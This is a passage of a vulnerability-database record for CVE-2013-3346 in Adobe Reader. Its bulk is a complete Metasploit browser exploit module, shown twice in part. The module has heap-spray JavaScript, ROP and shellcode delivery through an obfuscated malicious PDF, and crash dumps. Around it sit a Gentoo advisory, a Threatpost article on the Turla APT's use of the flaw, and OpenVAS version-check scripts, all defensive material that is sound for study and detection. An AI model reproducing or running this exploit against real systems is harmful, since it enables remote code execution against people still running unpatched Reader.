nObfu(\"/Count 1\") << eol\r\n pdf << nObfu(\"/Type /Pages\") << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # page 1\r\n xref << pdf.length\r\n pdf << ioDef(3) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Parent \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Page\") << eol\r\n pdf << nObfu(\">>\") << eol # end obj dict\r\n pdf << endobj\r\n\r\n # js action\r\n xref << pdf.length\r\n pdf << ioDef(4) << nObfu(\"<<\")\r\n pdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5)\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # js stream\r\n xref << pdf.length\r\n compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n pdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << compressed << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n\r\n ###\r\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\r\n ###\r\n\r\n # form object\r\n xref << pdf.length\r\n pdf << ioDef(6)\r\n pdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol\r\n pdf << endobj\r\n\r\n # form stream\r\n xfa = <<-EOF\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\r\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\n EOF\r\n\r\n xref << pdf.length\r\n pdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << xfa << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n\r\n ###\r\n # end form stuff for icucnv36.dll / icucnv40.dll\r\n ###\r\n\r\n\r\n # trailing stuff\r\n xrefPosition = pdf.length\r\n pdf << \"xref\" << eol\r\n pdf << \"0 %d\" % (xref.length 
+ 1) << eol\r\n pdf << \"0000000000 65535 f\" << eol\r\n xref.each do |index|\r\n pdf << \"%010d 00000 n\" % index << eol\r\n end\r\n\r\n pdf << \"trailer\" << eol\r\n pdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n pdf << \"startxref\" << eol\r\n pdf << xrefPosition.to_s() << eol\r\n\r\n pdf << \"%%EOF\" << eol\r\n pdf\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n* crash Adobe Reader 10.1.4\r\n\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\r\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\r\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\r\n\r\n* crash Adobe Reader 11.0.2\r\n\r\n(940.d70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\r\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\r\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\r\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\r\n\r\n=end\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30394/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:26", "bulletinFamily": "unix", "description": "### Background\n\nAdobe Reader is a closed-source PDF reader.\n\n### Description\n\nAn unspecified vulnerability exists in Adobe Reader.\n\n### Impact\n\nAn attacker could execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-9.5.5\"", "modified": "2013-09-15T00:00:00", "published": "2013-09-15T00:00:00", "id": "GLSA-201309-10", "href": "https://security.gentoo.org/glsa/201309-10", "type": "gentoo", "title": "Adobe Reader: Arbitrary Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-16T01:27:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "id": "1337DAY-ID-21684", "href": "https://0day.today/exploit/description/21684", "type": "zdt", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include 
Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Adobe Reader ToolButton Use After Free\",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\r\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\r\n the cEnable callback can be used to early free the object memory. Later use of the object\r\n allows triggering the use after free condition. This module has been tested successfully\r\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\r\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\r\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Soroush Dalili', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3346' ],\r\n [ 'OSVDB', '96745' ],\r\n [ 'ZDI', '13-212' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\",\r\n 'DisableNops' => true\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,\r\n :ua_name => Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Aug 08 2013\",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def on_request_exploit(cli, 
request, target_info)\r\n print_status(\"request: #{request.uri}\")\r\n js_data = make_js(cli, target_info)\r\n # Create the pdf\r\n pdf = make_pdf(js_data)\r\n print_status(\"Sending PDF...\")\r\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n end\r\n \r\n def make_js(cli, target_info)\r\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\r\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\r\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\r\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\r\n \r\n js = %Q|\r\nfunction heapSpray(str, str_addr, r_addr) {\r\n var aaa = unescape(\"%u0c0c\");\r\n aaa += aaa;\r\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\r\n var i1 = r_addr - 0x24;\r\n var bbb = aaa.substring(0, i1 / 2);\r\n var sa = str_addr;\r\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\r\n bbb += sa;\r\n bbb += aaa;\r\n var i11 = 0x0c0c - 0x24;\r\n bbb = bbb.substring(0, i11 / 2);\r\n bbb += str;\r\n bbb += aaa;\r\n var i2 = 0x4000 + 0xc000;\r\n var ccc = bbb.substring(0, i2 / 2);\r\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\r\n var i3 = (0x1020 - 0x08) / 2;\r\n var ddd = ccc.substring(0, 0x80000 - i3);\r\n var eee = new Array();\r\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\";\r\n return;\r\n}\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\nvar executable = \"\";\r\nvar rop10 = unescape(\"#{rop_10}\");\r\nvar rop11 = unescape(\"#{rop_11}\");\r\nvar r11 = false;\r\nvar vulnerable = true;\r\n \r\nvar obj_size;\r\nvar rop;\r\nvar ret_addr;\r\nvar rop_addr;\r\nvar r_addr;\r\n \r\nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\r\n obj_size = 0x360 + 0x1c;\r\n rop = rop10;\r\n rop_addr = unescape(\"%u08e4%u0c0c\");\r\n r_addr = 0x08e4;\r\n ret_addr = unescape(\"%ua8df%u4a82\");\r\n} else if (app.viewerVersion >= 11 && 
app.viewerVersion <= 11.002) {\r\n r11 = true;\r\n obj_size = 0x370;\r\n rop = rop11;\r\n rop_addr = unescape(\"%u08a8%u0c0c\");\r\n r_addr = 0x08a8;\r\n ret_addr = unescape(\"%u8003%u4a84\");\r\n} else {\r\n vulnerable = false;\r\n}\r\n \r\nif (vulnerable) {\r\n var payload = rop + shellcode;\r\n heapSpray(payload, ret_addr, r_addr);\r\n \r\n var part1 = \"\";\r\n if (!r11) {\r\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\");\r\n }\r\n part1 += rop_addr;\r\n var part2 = \"\";\r\n var part2_len = obj_size - part1.length * 2;\r\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\");\r\n var arr = new Array();\r\n \r\n removeButtonFunc = function () {\r\n app.removeToolButton({\r\n cName: \"evil\"\r\n });\r\n \r\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\r\n }\r\n \r\n addButtonFunc = function () {\r\n app.addToolButton({\r\n cName: \"xxx\",\r\n cExec: \"1\",\r\n cEnable: \"removeButtonFunc();\"\r\n });\r\n }\r\n \r\n app.addToolButton({\r\n cName: \"evil\",\r\n cExec: \"1\",\r\n cEnable: \"addButtonFunc();\"\r\n });\r\n}\r\n|\r\n \r\n js\r\n end\r\n \r\n def RandomNonASCIIString(count)\r\n result = \"\"\r\n count.times do\r\n result << (rand(128) + 128).chr\r\n end\r\n result\r\n end\r\n \r\n def ioDef(id)\r\n \"%d 0 obj \\n\" % id\r\n end\r\n \r\n def ioRef(id)\r\n \"%d 0 R\" % id\r\n end\r\n \r\n \r\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n def nObfu(str)\r\n #return str\r\n result = \"\"\r\n str.scan(/./u) do |c|\r\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n result << \"#%x\" % c.unpack(\"C*\")[0]\r\n else\r\n result << c\r\n end\r\n end\r\n result\r\n end\r\n \r\n \r\n def ASCIIHexWhitespaceEncode(str)\r\n result = \"\"\r\n whitespace = \"\"\r\n str.each_byte do |b|\r\n result << whitespace << \"%02x\" % b\r\n whitespace = \" \" * (rand(3) + 1)\r\n end\r\n result << \">\"\r\n end\r\n \r\n \r\n def make_pdf(js)\r\n xref = []\r\n eol = \"\\n\"\r\n endobj = \"endobj\" 
<< eol\r\n \r\n # Randomize PDF version?\r\n pdf = \"%PDF-1.5\" << eol\r\n pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n \r\n # catalog\r\n xref << pdf.length\r\n pdf << ioDef(1) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Pages \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Catalog\") << eol\r\n pdf << nObfu(\"/OpenAction \") << ioRef(4) << eol\r\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\r\n pdf << nObfu(\"/AcroForm \") << ioRef(6) << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # pages array\r\n xref << pdf.length\r\n pdf << ioDef(2) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol\r\n pdf << nObfu(\"/Count 1\") << eol\r\n pdf << nObfu(\"/Type /Pages\") << eol\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # page 1\r\n xref << pdf.length\r\n pdf << ioDef(3) << nObfu(\"<<\") << eol\r\n pdf << nObfu(\"/Parent \") << ioRef(2) << eol\r\n pdf << nObfu(\"/Type /Page\") << eol\r\n pdf << nObfu(\">>\") << eol # end obj dict\r\n pdf << endobj\r\n \r\n # js action\r\n xref << pdf.length\r\n pdf << ioDef(4) << nObfu(\"<<\")\r\n pdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5)\r\n pdf << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # js stream\r\n xref << pdf.length\r\n compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n pdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << compressed << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\r\n ###\r\n \r\n # form object\r\n xref << pdf.length\r\n pdf << ioDef(6)\r\n pdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol\r\n pdf << endobj\r\n \r\n # form stream\r\n xfa = <<-EOF\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config 
xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\r\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\n EOF\r\n \r\n xref << pdf.length\r\n pdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol\r\n pdf << \"stream\" << eol\r\n pdf << xfa << eol\r\n pdf << \"endstream\" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # end form stuff for icucnv36.dll / icucnv40.dll\r\n ###\r\n \r\n \r\n # trailing stuff\r\n xrefPosition = pdf.length\r\n pdf << \"xref\" << eol\r\n pdf << \"0 %d\" % (xref.length + 1) << eol\r\n pdf << \"0000000000 65535 f\" << eol\r\n xref.each do |index|\r\n pdf << \"%010d 00000 n\" % index << eol\r\n end\r\n \r\n pdf << \"trailer\" << eol\r\n pdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n \r\n pdf << \"startxref\" << eol\r\n pdf << xrefPosition.to_s() << eol\r\n \r\n pdf << \"%%EOF\" << eol\r\n pdf\r\n end\r\n \r\nend\r\n \r\n \r\n=begin\r\n \r\n* crash Adobe Reader 10.1.4\r\n \r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\r\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\r\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\r\n \r\n* crash Adobe Reader 11.0.2\r\n \r\n(940.d70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\r\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\r\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\r\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\r\n \r\n=end\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21684"}], "thn": [{"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "description": "None\n", "modified": "2013-11-29T15:47:58", "published": "2013-11-29T04:40:00", "id": "THN:1EA4AB16D6C3A0518A078CC8C9304FA5", "href": "http://thehackernews.com/2013/11/CVE-2013-5065-Windows-XP-Privilege-escalation-Zero-Day-exploit.html", "type": "thn", "title": "CVE-2013-5065: Microsoft Windows XP and Server 2003 Privilege escalation Zero-Day exploit discovered", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:22", "bulletinFamily": "info", "description": "The [Turla APT campaign](<http://threatpost.com/agent-btz-malware-may-have-served-as-starting-point-for-red-october-turla/104735>) has baffled researchers for months as to how its victims are compromised. 
Peaking during the first two months of the year, Turla has targeted municipal governments, embassies, militaries and other high-value targets worldwide, with particular concentrations in the Middle East and Europe.\n\nResearchers at Kaspersky Lab, however, today announced they have discovered a [precursor to Turla called Epic](<https://securelist.com/analysis/publications/65545/the-epic-turla-operation/>) that uses a cocktail of zero-days and off-the-shelf exploits against previously unknown and patched vulnerabilities to compromise victims. Epic is the first stage of a multistage attack that hits victims via spear-phishing campaigns, social engineering scams, or watering hole attacks against websites of interest to the victims.\n\nEpic shares code snippets with Turla and similar encryption used to confound researchers, suggesting a link between the two campaigns; either the attackers are cooperating or are the same group, Kaspersky researchers said.\n\nTo date, there are more than 500 victim IP addresses in 45 countries, and as of Tuesday the campaign remained active. The malware establishes a backdoor connection to the attackers through which system information is sent in order to determine which exploits are fed to the compromised machine and ultimately where stolen data is exfiltrated. The attackers have a variety of backdoors at their disposal, and use them according to the value of the target, Kaspersky researchers said.\n\nTwo zero-day exploits, against vulnerabilities in Windows XP and Windows Server 2003 ([CVE-2013-5065](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5065>)) and in Adobe Reader ([CVE-2013-3346](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346>)), have been used against some targets in order to gain administrative privileges. Users are infected via spear-phishing emails with infected PDF exploits, or via infected websites hosting Java exploits that are really malware installers posing as a .scr file or Flash Player. 
Victims are tricked, in the last two cases, into installing the infected files, Kaspersky researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015516/Epic-Turla.png>)\n\nMore than 100 websites have been infected in the Epic campaign, most of them municipal government websites, including the website for City Hall in Pinor, Spain, an entrepreneurial site in Romania and the Palestinian Authority Ministry of Foreign Affairs. All of the sites were built using the TYPO3 content management system, indicating the attackers have access to a vulnerability on that platform. Once compromised, the websites then load remote JavaScript that performs a number of tasks, including dropping exploits for flaws in Internet Explorer 6-8, recent Java or Flash bugs, or a phony Microsoft Security Essentials application signed with a legitimate certificate from Sysprint AG.\n\n\u201cThe Epic Turla attackers are extremely dynamic in using exploits or different methods depending on what is available at the moment,\u201d Kaspersky Lab said in its research report.\n\nMore than 50 hacked servers make up the Epic Turla command infrastructure, Kaspersky Lab said. Victimized computers communicate to a centralized server via a network of proxies and VPN connections. The attackers make a determination whether to exploit a particular machine based on a number of existing system and third-party application configurations. If certain processes, such as tcpdump, windump, ethereal, wireshark and others are running, the backdoor will terminate. Otherwise, if the victim is of interest, a different backdoor called Carbon or Pfinet, is deployed and the Epic campaign updates the configuration file with a new set of command and control servers, further indicating a connection between the Epic and Turla campaigns. Attack commands are sent that include a keylogger used to steal credentials in order to move laterally, as well as a list of specific .doc files to search for. 
Some of the document searches found are: \u201cNATO.msg;\u201d \u201ceu energy dialogue;\u201d and \u201cEU.msg.\u201d\n\n\u201cThe configuration updates for the Cobra/Carbon system malware, also known as Pfinet, are interesting, because this is another project related to the Turla threat actor. This suggests that we are dealing with a multi-stage infection that begins with the Epic Turla \u2013 to gain a foothold and validate the high profile victim. If the victim is interesting, it gets upgraded to the full Turla Carbon system,\u201d said Costin Raiu, Director of the Global Research and Analysis Team at Kaspersky Lab.\n\nThe Carbon backdoors, meanwhile, share characteristics with other attack platforms such as Tilded and Flame, as well as some subtle connections to [Miniduke](<https://securelist.com/blog/incidents/31112/the-miniduke-mystery-pdf-0-day-government-spy-assembler-0x29a-micro-backdoor>). The attackers do not seem to be native English speakers, Kaspersky\u2019s report said. One of the Epic backdoors is called \u201cZagruzchik.dll\u201d, which translates to bootloader in Russian, and the Epic Turla control panel is set to Cyrillic.\n\nMost of the victims are in France, the United States, Iran and Russia, with targets ranging from ministries of the interior, trade and commerce, foreign affairs and intelligence in the European Union and Asia.\n", "modified": "2014-08-13T14:43:15", "published": "2014-08-07T10:00:03", "id": "THREATPOST:B27D20AA97E34E737FEFFB96CFD7603B", "href": "https://threatpost.com/epic-operation-kicks-off-multistage-turla-apt-campaign/107612/", "type": "threatpost", "title": "Epic Operation Kicks Off Multistage Turla APT Campaign", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-07-17T14:29:45", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.", "modified": 
"2019-07-05T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803616", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_may13_win.nasl 29729 2013-05-28 10:47:39Z may$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803616\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:47:39 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Acrobat Version 11.0.03 or 10.1.7 or 9.5.5 or 
later.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.5 on Windows\nAdobe Acrobat Version 10.x prior to 10.1.7 on Windows\nAdobe Acrobat Version 11.x prior to 11.0.03 on Windows\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!acrobatVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:29:44", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.", "modified": "2019-07-05T00:00:00", "published": 
"2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803617", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_may13_macosx.nasl 29729 2013-05-28 10:51:02Z may$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
